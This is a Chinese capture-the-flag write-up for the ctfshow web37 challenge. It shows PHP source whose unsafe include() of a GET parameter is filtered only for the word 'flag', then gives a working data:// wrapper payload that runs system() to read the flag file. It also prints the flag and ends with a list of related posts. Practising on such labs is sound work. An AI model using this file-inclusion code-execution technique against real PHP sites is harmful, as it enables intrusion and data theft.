ctfshow-命令执行-web37
ctfshow-web37
文章目录
- ctfshow-web37
- 题目描述:
- 原理:
- 审计:
- 方法:
- 思路:
- 利用文件按包含漏洞,data协议
- Flag:
题目描述:
原理:
审计:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*///flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag/i", $c)){ //过滤了flaginclude($c); //文件包含漏洞,包含变量cecho $flag; //输出变量flag的内容}}else{highlight_file(__FILE__);
}
方法:
思路:
利用文件按包含漏洞,data协议
以为include()函数可以文件包含一个文件,并且可以执行该文件的内容(如果该文件有代码内容的话)
这个题是include包含的变量c,同样,可以利用文件包含漏洞,将c变量想办法变更成php代码,从而通过include函数执行。
协议:
php://协议
php:// 访问各个输入/输出流,在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行
file://协议 用于访问本地文件系统,在CTF中通常用来读取本地文件
data://协议 通常可以用来执行PHP代码
payload:
http://31dfeb01-c218-4654-a73b-b762ec34a248.challenge.ctf.show/?c=data://text/plain,<?php system("cat fla*.php");?>
ls查看有什么文件,发现flag.php
cat flag.php
http://31dfeb01-c218-4654-a73b-b762ec34a248.challenge.ctf.show/?c=data://text/plain,<?php system("cat fla*.php");?>
得到flag
Flag:
ctfshow{f743851c-e2ec-4033-b3ed-356d7ac1863d}
ctfshow-命令执行-web37相关推荐
- CTFshow 命令执行 web37
源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified ...
- CTFshow——命令执行
CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...
- [CTFSHOW]命令执行
文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...
- CTFshow命令执行29-123
命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...
- CTFshow 命令执行 web72
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...
- ctfshow命令执行(持续更新,已更至web39)
做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...
- ctfshow 命令执行 web29-web77 web118-122 web124 wp
南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...
- ctfshow命令执行篇
web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...
- [CTFSHOW]命令执行55-74
web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...
- ctfshow命令执行
目录 web33:[文件包含] web34: web35: web36:多过滤了0-9的数字,用参数逃逸可以不用数字,用字母就可以成功绕过 ,步骤一样,略 web37: web38: web39: w ...
最新文章
- 机器学习调参自动优化方法
- Linux中TFTP使用详解
- 图解Windows下使用SSH Secure Shell Client远程连接Linux
- bootcmd 和bootargs
- Database2Sharp重要更新之完善EnterpriseLibrary架构代码
- html页面怎么添加打印,在网页中添加打印按钮或链接的方法
- mysql导入超大sql文件时mysql服务重启
- c ++基本数据类型_C ++中的数据类型
- javascript中insertRow(index) 和insertCell(index)
- HTML5游子吟网页的完整代码,游子吟
- matlab调用pspice结果,使PSpice输出数据文件可以导入到MATLAB中绘制图形.pdf
- android上查看浏览器内核版本号,各种浏览器的userAgent及如何使用JS来检测游览器类型,或android是什么版本号...
- [注]打动我的50句广告语
- BZOJ3097Hash Killer I
- 《信息安全系统设计基础》实验三 《实时系统的移植》 问题总结
- ES6_1.块级作用域绑定_临时死区TDZ
- 新出炉的 100+ 篇技术热文,在微信热传,别错过哦
- ieee 754 java_IEEE 754到十进制
- 关于oracle中ora-00600的报错
- 可口可乐市场调查失败的原因_经典案例5:可口可乐:一次市场调研失败的教训...